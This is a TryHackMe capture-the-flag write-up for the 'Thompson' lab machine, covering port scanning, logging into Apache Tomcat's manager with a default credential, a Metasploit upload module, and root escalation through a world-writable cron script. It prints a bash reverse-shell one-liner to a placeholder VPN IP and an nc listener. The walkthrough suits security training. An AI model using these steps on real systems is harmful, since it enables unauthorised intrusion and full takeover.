Thompson — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Thompson — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opend ports.
nmap -A -T4 -p- -v <ip>
There’re 3 ports opened: 22(ssh), 8080(http) and 8009(ajp). Let’s access its website via port 8080.
It’s a default Apache website. I’ve checked the page source but nothing valuable. Now I’ll scan for hidden dirs using gobuster
gobuster dir -u http://<ip>:8080 -w /path-to-wordlist
There are 2 folders suspicious: /host-manager and /manager
First let’s access /manager
It will prompt for username and password. I haven’t known yet, so I click cancel. And surprisingly, it led me to a default credential:
Well let’s try again with tomcat:s3cret
Boom! I’m in. Also try this credential for /host-manager and still successful.
Now I’ll find a way to upload a reverse shell into the webserver and gain access. There are 2 ways to do this: gain a shell directly via metasploit, or use metasploit to generate a .war shell and access via browser.
*Why .war but not .php? Because:
I will use the 1st way.
msfdb init && msfconsole
Then search for tomcat exploit:
Now I found a module to use.
In order to exploit, you need to specify the username and password of tomcat, which is tomcat:s3cret, RHOSTS, which is the machine ip, and RPORT to 8080. And also, change LHOST to your VPN ip.
After everything is set, run
Boom! Now I’ve had the meterpreter shell. Move around and get the first flag in /home/jack
Now let’s get root to get our final flag. Input “shell” to spawn a shell. Then use python to spawn a tty shell.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
There is a script called “id.sh”. What it does is that print id command’s result to test.txt. Read the content of test.txt:
Now i know that there will be a cronjob. This cronjob will run id.sh as root. So let’s check if I can modify the content of this script.
Yes I can, because its permission is 777! So let’s modify the content of this shell to spawn a shell, and wait for the cronjob to run.
cat > id.sh <<EOF
bash -i >& /dev/tcp/<your-vpn-ip>/<port> 0>&1
Check the content of id.sh again:
Now start a listener on your machine:
nc -lvnp <port>
Wait for about 1 min, I’m root!
Get the final flag:
If you want to try the 2nd way, which is generating a .war shell and access via browser, read the content here: